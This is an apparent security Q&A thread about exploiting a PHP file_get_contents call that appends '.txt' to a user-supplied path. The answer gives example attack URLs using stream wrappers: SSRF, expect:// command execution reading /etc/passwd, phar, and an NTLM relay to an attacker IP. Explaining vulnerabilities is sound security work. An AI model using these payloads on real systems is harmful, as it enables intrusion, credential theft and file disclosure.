1

Let's say I have the following PHP code:

<?php
    echo file_get_contents($_GET['path'] . ".txt");

Obviously, it's insecure as path traversal is possible when passing e.g. ../../file as a GET parameter.

But is there any way for an attacker to retrieve contents of a file that doesn't end with .txt as Null byte related issues like \0 seem to be have been fixed in PHP5.3?

dmuensterer
  • 1,144
  • 4
  • 13
  • I don't know of any way to access local files which don't end in .txt with this since both Null byte injection and path truncation were fixed in PHP 5.3, but this is also vulnerable to xss. – nobody Nov 07 '20 at 15:44

1 Answers1

2

Per the comment above you could use path truncation on an older version of PHP, however, as there is no data before the attacker controlled data you can use wrappers (https://www.php.net/manual/en/wrappers.php). This means the vulnerability is not just a directory traversal, but can be used for a number of attacks, including SSRF and remote code execution. Here are a few examples:

  1. Server side request forgery: https://example/file.php?path=http://internalsystem/path/file?junk=

  2. RCE via expect: https://example/file.php?path=expect://cat /etc/passwd;echo

  3. RCE via phar: https://example/file.php?path=phar://tmp/uploadedfile (needs a .txt extension on the uploaded file)

  4. RCE via NTLM relay (if its a windows box) https://example/file.php?path=\\attackerip\nonexitentfile You'll need to set up tooling for this, such as responder (https://github.com/lgandx/Responder)

Depending on the application you may also be able to use the ftp:// and ssh:// wrappers to run commands or access other files on the server.

Hope this helps, and good luck

wireghoul
  • 5,745
  • 2
  • 17
  • 26